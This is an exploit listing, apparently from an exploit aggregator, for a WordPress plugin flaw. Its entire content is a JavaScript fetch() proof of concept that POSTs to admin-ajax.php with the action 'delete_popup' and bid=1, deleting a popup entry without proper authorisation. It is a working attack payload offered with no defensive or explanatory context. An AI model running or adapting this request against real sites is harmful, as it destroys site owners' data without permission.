Share
## https://sploitus.com/exploit?id=WPEX-ID:50037028-2790-47EE-AAE1-FAF0724EB917
fetch('/wordpress/wp-admin/admin-ajax.php?action=delete_popup', {
  method: 'POST',headers:{"content-type":"application/x-www-form-urlencoded"},
  body: "bid=1",
}).then(response => response.text())
  .then(data => console.log(data));